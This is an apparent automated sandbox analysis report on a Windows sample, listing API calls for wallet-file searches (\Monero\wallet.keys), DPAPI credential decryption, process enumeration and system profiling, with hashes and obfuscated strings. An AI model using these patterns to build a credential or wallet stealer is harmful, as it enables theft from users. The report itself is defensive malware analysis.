                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 5fc64bddabe7ed06781f636e23ab57edb87ab8f3899b4797f82adef897b84952
                              • Instruction ID: 6de04dd76fb6a5c996b9ac2aeaecd563b86aa77bf0555284af6c882e64a48f7e
                              • Opcode Fuzzy Hash: 5fc64bddabe7ed06781f636e23ab57edb87ab8f3899b4797f82adef897b84952
                              • Instruction Fuzzy Hash: AB12DA719101189BDB29FB60DCD6AEE7378AF58300F5441A9B50A73091EF706F89DFA2
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C70C2E), ref: 00C5DE5E
                              • StrCmpCA.SHLWAPI(?,00C714C8), ref: 00C5DEAE
                              • StrCmpCA.SHLWAPI(?,00C714CC), ref: 00C5DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5E3E0
                              • FindClose.KERNEL32(000000FF), ref: 00C5E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: ee34e0a6f0472a5c2268a6376b75fe09131899621225d2e8eeaf9ceab14a8b8d
                              • Instruction ID: a6a8aba2ff1d450786d6ed0d815b74d3e476c51a3e2a8a0c5f5b91eef240af20
                              • Opcode Fuzzy Hash: ee34e0a6f0472a5c2268a6376b75fe09131899621225d2e8eeaf9ceab14a8b8d
                              • Instruction Fuzzy Hash: 9AF1AF718241189ADB35FB61DCD6EEE7378AF58300F9041EAA51A72091EF306B89DF51
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C714B0,00C70C2A), ref: 00C5DAEB
                              • StrCmpCA.SHLWAPI(?,00C714B4), ref: 00C5DB33
                              • StrCmpCA.SHLWAPI(?,00C714B8), ref: 00C5DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5DDCC
                              • FindClose.KERNEL32(000000FF), ref: 00C5DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 08c1dfc17f785669015cc4810a77f953a840d20d277d66cc30d2cd622f5aaec1
                              • Instruction ID: 393dc0393f27a102320b2d80459fcc3844cdcc342d953e332186a5db1862eb0a
                              • Opcode Fuzzy Hash: 08c1dfc17f785669015cc4810a77f953a840d20d277d66cc30d2cd622f5aaec1
                              • Instruction Fuzzy Hash: 809154769002049BCB24FF70DC96AED737DAF88300F408569BD1AA6181EE349B4DDF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: QZy;$b4+$kC?y$o?xY$on~$sk7v$wf{7${m>W$PS
                              • API String ID: 0-1821273058
                              • Opcode ID: 6531dc0621f7cf610176a45e6b426b851a8820deb1ae89c5888c281defc2921b
                              • Instruction ID: fb9603f3afb10ee903eb35091caaf5bdcae2d03483817961d36d317d2fa66f8c
                              • Opcode Fuzzy Hash: 6531dc0621f7cf610176a45e6b426b851a8820deb1ae89c5888c281defc2921b
                              • Instruction Fuzzy Hash: 98B228F360C2049FE3046E2DEC8577AB7E9EF94720F1A493DEAC4C7744EA3598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6u}o$Gtf$KHw$NVs$^Q{+$kje$$pjss$s<Sw$6?k
                              • API String ID: 0-4142855238
                              • Opcode ID: 929f35d4cad41f3de1637d4981a4e26432eb4b0412927a1a25a9909b250502fa
                              • Instruction ID: a9dad26e848af6a6d385482db76d7d1bdbf2e57a19f867e296b20ebe50f95527
                              • Opcode Fuzzy Hash: 929f35d4cad41f3de1637d4981a4e26432eb4b0412927a1a25a9909b250502fa
                              • Instruction Fuzzy Hash: 9AB226F3A0C2049FD3046E2DEC8567AFBE5EF94720F1A4A3DEAC583744EA3559048697
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00C705AF), ref: 00C67BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00C67BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C67C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C67C62
                              • LocalFree.KERNEL32(00000000), ref: 00C67D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 467a2d7601c297bac065eeabae779a17aa0605477d39ee30e75ac3339d3e4c17
                              • Instruction ID: 557b6833cf91a44bf4697d58d7ce50ab08a3b668ba4868e266a56da17d26016e
                              • Opcode Fuzzy Hash: 467a2d7601c297bac065eeabae779a17aa0605477d39ee30e75ac3339d3e4c17
                              • Instruction Fuzzy Hash: 44413B71940218ABCB24DB95DCD9BEEB374FF48700F204699E10972180DB342F85CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $<>$<$x{$Jgw$SZgz$[/O$z[h$j?
                              • API String ID: 0-3427209661
                              • Opcode ID: dd1ba9af9e747b15c96ba60d9be8037a436cfb32c8b3b4337730f30c4b97bcdb
                              • Instruction ID: 2fc5a24c355abfb51eb8e8e75b2ae4979a608b09a677f51ddd43efe1ddee0380
                              • Opcode Fuzzy Hash: dd1ba9af9e747b15c96ba60d9be8037a436cfb32c8b3b4337730f30c4b97bcdb
                              • Instruction Fuzzy Hash: 45B217F360C6049FE3046E2DEC8567AFBE9EF94720F1A493DE6C4C3744EA3599018696
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C70D73), ref: 00C5E4A2
                              • StrCmpCA.SHLWAPI(?,00C714F8), ref: 00C5E4F2
                              • StrCmpCA.SHLWAPI(?,00C714FC), ref: 00C5E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: bc3e4b04a5e847d17794a9cc4762d24f486e7ec8732f11245eb6481dfc583813
                              • Instruction ID: a17ae2e45532c2bafdd6fec5f4eb6548bcefcaa874e89e2ecb8d730d37ebf56d
                              • Opcode Fuzzy Hash: bc3e4b04a5e847d17794a9cc4762d24f486e7ec8732f11245eb6481dfc583813
                              • Instruction Fuzzy Hash: 4B121E719101189ADB28FB71DDD6EEE7338AF58300F5045A9B50AB7091EE306F89DF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <*y$L\{v$e4}$god?$jMs>$w"|u
                              • API String ID: 0-2148103553
                              • Opcode ID: 36f246df4ca1a78e8f60f110ffe327acc56e67a597f5c5250804f96f522b27cb
                              • Instruction ID: e800b4ba8587b7ea507ef29169d0b30a83187645137471c28719fcb139673758
                              • Opcode Fuzzy Hash: 36f246df4ca1a78e8f60f110ffe327acc56e67a597f5c5250804f96f522b27cb
                              • Instruction Fuzzy Hash: 49B207F360C304AFE3046E6DEC8567ABBE9EFD4720F1A893DE6C487744E93558058692
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &p[;$B+`)$`h}$j(_-$zf|_
                              • API String ID: 0-3895703705
                              • Opcode ID: ad416b532d3cc3fadddbb67de6dbc8ac009ea5fa7f729760d5a6465947680442
                              • Instruction ID: 42f0cd6aeed72acfb7cf1e37ecb4ea1f0104d3899d49780897630b04cc2cb6c7
                              • Opcode Fuzzy Hash: ad416b532d3cc3fadddbb67de6dbc8ac009ea5fa7f729760d5a6465947680442
                              • Instruction Fuzzy Hash: F1B228F36082049FE304AE2DEC8567ABBD9EF94720F1A853DE6C4C7744EA3598058797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &)x4$=}X$@?g?$M6_$TM[
                              • API String ID: 0-3267072730
                              • Opcode ID: e80e22e325d26efd5b0c31b6a0693e150777e1c04e4a5b335e9d8cd8f215f51d
                              • Instruction ID: 3a21ee444cb10f2ab606999f622d51ceba7f4687fdcfb4e4905dc906231d12f3
                              • Opcode Fuzzy Hash: e80e22e325d26efd5b0c31b6a0693e150777e1c04e4a5b335e9d8cd8f215f51d
                              • Instruction Fuzzy Hash: 5AB2E5F3A0C2009FE304AE29EC8567AF7E9EF94720F1A893DE6C4C7744E63558458697
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C5C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C5C87C
                              • lstrcat.KERNEL32(?,00C70B46), ref: 00C5C943
                              • lstrcat.KERNEL32(?,00C70B47), ref: 00C5C957
                              • lstrcat.KERNEL32(?,00C70B4E), ref: 00C5C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 1bb01de23dd8476cce0ee91c68deffa2d9095cbf7dee27c875b0f5aadfc0f73c
                              • Instruction ID: e061d87dff41326298f8fb6e8db8d9e444534b6bc0ae60c628c6f05525731cb6
                              • Opcode Fuzzy Hash: 1bb01de23dd8476cce0ee91c68deffa2d9095cbf7dee27c875b0f5aadfc0f73c
                              • Instruction Fuzzy Hash: 74415BB890421ADFDB10CF90DC89BFEB7B8AF48304F1441A9E509A6280D7745B88CF92
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C5724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C57254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C57281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C572A4
                              • LocalFree.KERNEL32(?), ref: 00C572AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 19ea4b653f15ec83b7d4172b27672f64f6aebb08079d67bac24e8cf6f9a35c81
                              • Instruction ID: c10096b35f21cb512f23474e8411959e40957375af550fd3489ab2e024ad0d7f
                              • Opcode Fuzzy Hash: 19ea4b653f15ec83b7d4172b27672f64f6aebb08079d67bac24e8cf6f9a35c81
                              • Instruction Fuzzy Hash: 970140B5A40208BFDB24DBD4DD4AF9E7778AB44701F104156FB05BA2C0C670AA048BA5
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C6961E
                              • Process32First.KERNEL32(00C70ACA,00000128), ref: 00C69632
                              • Process32Next.KERNEL32(00C70ACA,00000128), ref: 00C69647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00C6965C
                              • CloseHandle.KERNEL32(00C70ACA), ref: 00C6967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 61dafa41febdaae96ae31f0ad17d1482069020493d2b527afc1520dac35088fc
                              • Instruction ID: 7cdd5dfdb8ae44b9af3a756f8df24e002e3910d53ffd0aa3337e74fffa6f0267
                              • Opcode Fuzzy Hash: 61dafa41febdaae96ae31f0ad17d1482069020493d2b527afc1520dac35088fc
                              • Instruction Fuzzy Hash: 7B01E9B5A00208AFCB64DFA6C988BEDB7F9EF48300F14419AA906A6240D7749B44CF91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <b}{$HN-}$d2>$xL9O
                              • API String ID: 0-2644612385
                              • Opcode ID: 315db04da4d92e53e940e24b34b9594e099f3f7ebd29e0968b9262eb09bb8cfb
                              • Instruction ID: ec36a1649df44f9e0297beb4563fa8f2a7cb6980e72557433729c4b4ded457a5
                              • Opcode Fuzzy Hash: 315db04da4d92e53e940e24b34b9594e099f3f7ebd29e0968b9262eb09bb8cfb
                              • Instruction Fuzzy Hash: 46B2F7F3A08204AFE3046E2DDC8567AFBE9EF94720F1A493DE6C4C3744EA3558118697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 03YE$2bmv$8P_$vupo
                              • API String ID: 0-1257031978
                              • Opcode ID: 02944471f350f5c9be0929af88f7c8f4ce0f294ce23857ab364c6d1d1d6e9368
                              • Instruction ID: 22702bb4a155ce763f7d57113e77ac25e02b9ee297ca83ad4964820731ba5ee8
                              • Opcode Fuzzy Hash: 02944471f350f5c9be0929af88f7c8f4ce0f294ce23857ab364c6d1d1d6e9368
                              • Instruction Fuzzy Hash: D39227F360C2049FE304AE2DEC8577ABBE9EB94720F16853DEAC4C3744EA3558158697
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C705B7), ref: 00C686CA
                              • Process32First.KERNEL32(?,00000128), ref: 00C686DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00C686F3
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • CloseHandle.KERNEL32(?), ref: 00C68761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00C55184,40000001,00000000,00000000,?,00C55184), ref: 00C68EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00C54EEE,00000000,?), ref: 00C59B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59B2A
                              • LocalFree.KERNEL32(?,?,?,?,00C54EEE,00000000,?), ref: 00C59B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C70E00,00000000,?), ref: 00C679B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C679B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00C70E00,00000000,?), ref: 00C679C4
                              • wsprintfA.USER32 ref: 00C679F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007FE158,00000000,?,00C70E10,00000000,?,00000000,00000000), ref: 00C67A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007FE158,00000000,?,00C70E10,00000000,?,00000000,00000000,?), ref: 00C67A7D
                              • wsprintfA.USER32 ref: 00C67AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .({#$/U|T$Ksk8$oi=
                              • API String ID: 0-3801719784
                              APIs
                              • CoCreateInstance.COMBASE(00C6E118,00000000,00000001,00C6E108,00000000), ref: 00C63758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C637B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C59B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C59BA3
                              • LocalFree.KERNEL32(?), ref: 00C59BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'fZS$S]l
                              • API String ID: 0-4242958975
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: tD<e$1c
                              • API String ID: 0-4293494802
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #yw)$ZC^?
                              • API String ID: 0-2541064788
                              • Opcode ID: 7f17ad3de818cbe33da3bbebdc4401d0a5f557ad269e31f1823ed78d560e4858
                              • Instruction ID: 728167eda40ff65dd6b5339d7a27d13d9617df2f40b6201608c9cadeb4a93576
                              • Opcode Fuzzy Hash: 7f17ad3de818cbe33da3bbebdc4401d0a5f557ad269e31f1823ed78d560e4858
                              • Instruction Fuzzy Hash: 8E31C3B250C700DFD3406A299D8437EB7EABBE4350F66C92D96CA0A618E27499418AD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Juvr
                              • API String ID: 0-1085866910
                              • Opcode ID: 85b99153a5487f211b04b4de951b60a67b2cb46d4e144a2222fc808102c57a09
                              • Instruction ID: 29b15ed431316c45f0b97721d1de484a84bbc77f974fe9eff3aa3bb318283dde
                              • Opcode Fuzzy Hash: 85b99153a5487f211b04b4de951b60a67b2cb46d4e144a2222fc808102c57a09
                              • Instruction Fuzzy Hash: 3D51D3F3A082049FE754AE2DDC5173ABBE5EBD4320F16853DEB88D3384E97548018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
